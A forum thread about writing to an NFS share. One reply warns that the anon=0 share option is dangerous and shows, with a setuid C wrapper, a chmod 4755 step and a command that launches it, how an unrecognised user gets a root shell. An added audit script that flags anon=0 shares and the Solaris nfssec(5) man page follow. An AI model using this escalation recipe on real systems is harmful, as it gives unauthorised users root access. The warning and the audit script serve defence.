Unable to write to a mounted NFS share
Post 302917257 by achenle on Monday 15th of September 2014 01:53:16 PM
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
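
A server-side check for the setting discussed in the post above, as an added example that is not part of the original post. It assumes Solaris-style `share -F nfs -o ...` lines as found in a dfstab file; the function name `audit_dfstab` and the sample paths are hypothetical and the sample content is constructed.

```shell
#!/bin/sh
# Added example: audit Solaris-style share lines for anon=0.
# The dfstab content below is constructed sample data.

# audit_dfstab FILE
# Prints "<line-number> <shared-path>" for every share whose -o option
# list contains anon=0; returns 1 if any were found, 0 otherwise.
audit_dfstab() {
    awk '
    /^[[:space:]]*#/ || NF == 0 { next }    # skip comments and blank lines
    $1 == "share" {
        opts = ""
        for (i = 2; i < NF; i++)            # find the argument of -o
            if ($i == "-o") opts = $(i + 1)
        n = split(opts, o, ",")             # options are comma-separated
        for (j = 1; j <= n; j++)
            if (o[j] ~ /^anon=0+$/) {       # exact option, not anon=60001
                print NR, $NF               # pathname is the last argument
                bad = 1
            }
    }
    END { exit (bad ? 1 : 0) }
    ' "$1"
}

sample=$(mktemp)
cat > "$sample" <<'EOF'
# constructed sample dfstab
share -F nfs -o rw,anon=0 /export/scratch
share -F nfs -o rw=client1,anon=60001 /export/home
share -F nfs -o ro /export/docs
EOF
audit_dfstab "$sample" || echo "shares above map unknown users to uid 0"
rm -f "$sample"
```

The non-zero return status makes the function usable as a gate in a configuration check that should fail while any share still carries `anon=0`.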
 

nfssec(5)                                                            nfssec(5)

NAME
    nfssec - overview of NFS security modes

DESCRIPTION
    The mount_nfs(1M) and share_nfs(1M) commands each provide a way to specify the security mode to be used on an NFS file system through the sec=mode option. mode can be sys, dh, krb5, krb5i, krb5p, or none. These security modes can also be added to the automount maps. Note that mount_nfs(1M) and automount(1M) do not support sec=none at this time.

    mount_nfs(1M) allows you to specify a single security mode; share_nfs(1M) allows you to specify multiple modes (or none). With multiple modes, an NFS client can choose any of the modes in the list.

    The sec=mode option on the share_nfs(1M) command line establishes the security mode of NFS servers. If the NFS connection uses the NFS Version 3 protocol, the NFS clients must query the server for the appropriate mode to use. If the NFS connection uses the NFS Version 2 protocol, then the NFS client uses the default security mode, which is currently sys. NFS clients may force the use of a specific security mode by specifying the sec=mode option on the command line. However, if the file system on the server is not shared with that security mode, the client may be denied access.

    If the NFS client wants to authenticate the NFS server using a particular (stronger) security mode, the client should specify the security mode to be used, even if the connection uses the NFS Version 3 protocol. This guarantees that an attacker masquerading as the server does not compromise the client.

    The NFS security modes are described below. Of these, the krb5, krb5i, krb5p modes use the Kerberos V5 protocol for authenticating and protecting the shared filesystems. Before these can be used, the system must be configured to be part of a Kerberos realm. See SEAM(5).

    sys     Use AUTH_SYS authentication. The user's UNIX user-id and group-ids are passed in the clear on the network, unauthenticated by the NFS server. This is the simplest security method and requires no additional administration. It is the default used by Solaris NFS Version 2 clients and Solaris NFS servers.

    dh      Use a Diffie-Hellman public key system (AUTH_DES, which is referred to as AUTH_DH in the forthcoming Internet RFC).

    krb5    Use Kerberos V5 protocol to authenticate users before granting access to the shared filesystem.

    krb5i   Use Kerberos V5 authentication with integrity checking (checksums) to verify that the data has not been tampered with.

    krb5p   Use Kerberos V5 authentication, integrity checksums, and privacy protection (encryption) on the shared filesystem. This provides the most secure filesystem sharing, as all traffic is encrypted. It should be noted that performance might suffer on some systems when using krb5p, depending on the computational intensity of the encryption algorithm and the amount of data being transferred.

    none    Use null authentication (AUTH_NONE). NFS clients using AUTH_NONE have no identity and are mapped to the anonymous user nobody by NFS servers. A client using a security mode other than the one with which a Solaris NFS server shares the file system has its security mode mapped to AUTH_NONE. In this case, if the file system is shared with sec=none, users from the client are mapped to the anonymous user. The NFS security mode none is supported by share_nfs(1M), but not by mount_nfs(1M) or automount(1M).

FILES
    /etc/nfssec.conf    NFS security service configuration file

ATTRIBUTES
    See attributes(5) for descriptions of the following attributes:

    +-----------------------------+-----------------------------+
    | ATTRIBUTE TYPE              | ATTRIBUTE VALUE             |
    +-----------------------------+-----------------------------+
    | Availability                | SUNWnfscr                   |
    +-----------------------------+-----------------------------+

SEE ALSO
    automount(1M), mount_nfs(1M), share_nfs(1M), rpc_clnt_auth(3NSL), secure_rpc(3NSL), nfssec.conf(4), attributes(5)

NOTES
    /etc/nfssec.conf lists the NFS security services. Do not edit this file. It is not intended to be user-configurable.

13 Apr 2005                                                          nfssec(5)